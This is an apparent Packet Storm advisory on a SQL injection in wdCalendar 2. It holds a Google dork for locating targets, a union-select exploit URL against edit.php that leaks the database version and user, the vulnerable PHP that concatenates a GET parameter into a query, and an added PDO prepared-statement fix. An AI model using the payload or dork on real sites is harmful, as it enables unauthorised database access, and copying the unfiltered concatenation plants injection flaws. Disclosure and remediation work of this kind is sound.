wdCalendar 2 SQL Injection

2016-09-13T00:00:00
ID PACKETSTORM:138704
Type packetstorm
Reporter Alfonso Castillo Angel
Modified 2016-09-13T00:00:00

Description

                                        
`# Exploit Title: wdcalendar version 2 sql injection vulnerability  
# Google Dork: allinurl:"wdcalendar/edit.php"  
# Date: 12/09/2016  
# Exploit Author: Alfonso Castillo Angel  
# Software Link: https://github.com/ronisaha/wdCalendar  
# Version: Version 2  
# Tested on: Windows 7 ultimate  
# Category: webapps  
  
* Affected file -> edit.php and edit.db.php  
* Exploit ->  
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--  
  
  
* Vulnerable code:  
  
function getCalendarByRange($id){  
    try{  
        $db = new DBConnection();  
        $db->getConnection();  
        // $id is concatenated into the query without validation or escaping  
        $sql = "select * from `jqcalendar` where `id` = " . $id; // the variable is not filtered properly  
        $handle = mysql_query($sql);  
        //echo $sql;  
        $row = mysql_fetch_object($handle);  
    }catch(Exception $e){  
    }  
    return $row;  
}  
if($_GET["id"]){  
    // the request parameter is passed straight through to the query above  
    $event = getCalendarByRange($_GET["id"]); // the variable is not filtered properly  
}  
  
`
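
The remediation for the string concatenation flagged above, as an added example that is not part of the original advisory or of the wdCalendar code base. It assumes PDO is available; the function name `getCalendarById`, the in-memory SQLite table standing in for the MySQL `jqcalendar` table, the `subject` column and the sample inputs are all constructed for illustration.

```php
<?php
// Added example, not wdCalendar's code: hardened lookup for the `id` parameter.
// Assumptions: PDO is available; an in-memory SQLite table stands in for the
// MySQL `jqcalendar` table; the `subject` column and sample row are constructed.

function getCalendarById(PDO $db, $rawId)
{
    // Accept only a positive decimal integer; anything else
    // (e.g. "-1 union select ...") is rejected before it reaches the database.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // The value is bound as a typed parameter, never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT * FROM jqcalendar WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_OBJ);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jqcalendar (id INTEGER PRIMARY KEY, subject TEXT)');
$db->exec("INSERT INTO jqcalendar (id, subject) VALUES (1, 'constructed sample event')");

// Constructed inputs: one legitimate id, then values that must not reach the query.
$inputs = ['1', '-1 union select 1,version(),user(),4,5,6,7,8,9--', '1 or 1=1', ''];
foreach ($inputs as $in) {
    $row = getCalendarById($db, $in);
    printf("%-55s => %s\n", var_export($in, true), $row ? $row->subject : 'rejected / not found');
}
```

Only the first input returns the sample row; the other three fail integer validation and never reach the prepared statement.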